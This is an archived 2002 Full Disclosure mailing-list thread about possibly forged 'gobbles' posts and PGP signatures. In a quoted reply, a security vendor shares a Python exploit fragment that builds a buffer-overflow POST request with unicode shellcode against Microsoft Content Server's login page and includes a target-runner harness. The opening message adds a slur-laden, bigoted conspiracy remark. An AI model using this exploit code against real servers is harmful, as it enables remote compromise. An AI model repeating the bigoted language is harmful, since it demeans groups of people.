Full Disclosure mailing list archives
ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p
From: full-disclosure () lists netsys com (Anthony LaMantia)
Date: 13 Aug 2002 19:24:43 -0700
lol, well bugtraq is no different the dallas proxy was hacked a month or so back and all of the e-mail address it pwds: to published lol besides don't you know this is the first front the anti-white-war started by gayh1tler.. there is a lot of shit going down.. this list isn't gonna be the worst part

-Anthony LaMantia
www.bia-security.com

On Wed, 2002-08-14 at 15:17, security-protocols () hushmail com wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Maybe no one has noticed this but, this person is sending as 'gobbles () hush com' and not the real 'gobbles () hushmail com'. See below:

@hush.com email addresses 27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address.

- - -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

You supposed to be turkey friend turkey crew wanttobe yet you question show respect to turkey

On 14 Aug 2002 17:06:11 -0400, full-disclosure () lists netsys com wrote:

At least you got the key id correct that time. It's not a valid signature, but at least it produces one less error message.

-dave

ObExploit:

#fragment of my exploit for MS Content Server
#the full exploit can be found at https://immunitysec.com/members/
#but if you're not a member, this might save you some time writing your
#exploit.

#returns the sploitstring
def makesploit(self):
    header=""
    body=""
    body+="NR_DOMAIN=WinNT%3A%2F%2F"
    #1 alignment byte so we are word aligned with the return addr
    attack=""
    attack+="A"
    attack+="\x41\xb9"*4000
    #unicode shellcode!!
    attack=stroverwrite(attack,unicodeloop,1)
    print "length of overflow = "+str(len(attack))
    attack=urllib.quote(attack)
    #print attack
    body+=attack
    body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest Login.asp"
    header+="POST /NR/System/Access/ManualLoginSubmit.asp HTTP/1.1\r\n"
    header+="Host: "+self.host+"\r\n"
    header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; Bob)\r\n"
    header+="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla in ;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q =0.1\r\n"
    header+="Connection: keep-alive\r\n"
    header+="Content-Type: application/x-www-form-urlencoded\r\n"
    header+="Content-Length: "+str(len(body))+"\r\n"
    header+="\r\n"
    return header+body

#this stuff happens.
if __name__ == '__main__':
    print "Running Microsoft Content Server exploit v 0.1"
    app = mscsexploit()
    if len(sys.argv) < 2:
        print "Usage: mycontent.py target [port] [ssl=0]"
        sys.exit()
    app.setHost(sys.argv[1])
    if len(sys.argv) > 2:
        app.setPort(int(sys.argv[2]))
    if len(sys.argv) > 3:
        app.setSSL(1)
    app.run()

On Wed, 2002-08-14 at 17:00, gobbles () hush com wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

or if you like

On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave () immunitysec com> wrote:

On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote:

Gobbles,

On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles () hush com wrote:

GOBBLES just want to be cool whitehat like everyone else. Time for new leaf time for six figure salary stock option naked breasted assistant.

Word to that my man! ;)

peace,
core

Your message was signed, but the "GOBBLES" message was not and therefore just a forgery, most likely.

BTW: http://www.immunitysec.com/vulnerabilities/
They aren't advisories, but if you need something to show to your boss about why you disconnected your Exchange/SQL server from the Internet, it's a good start.

Dave Aitel
Immunity, Inc

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA
nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ==
=xfu0
-----END PGP SIGNATURE-----

Communicate in total privacy.
Get your free encrypted email at https://www.hushmail.com/?l=2
Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople

- - -----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw
9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi
=9eW6
- - -----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ
NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M
d18c
=gcJ+
-----END PGP SIGNATURE-----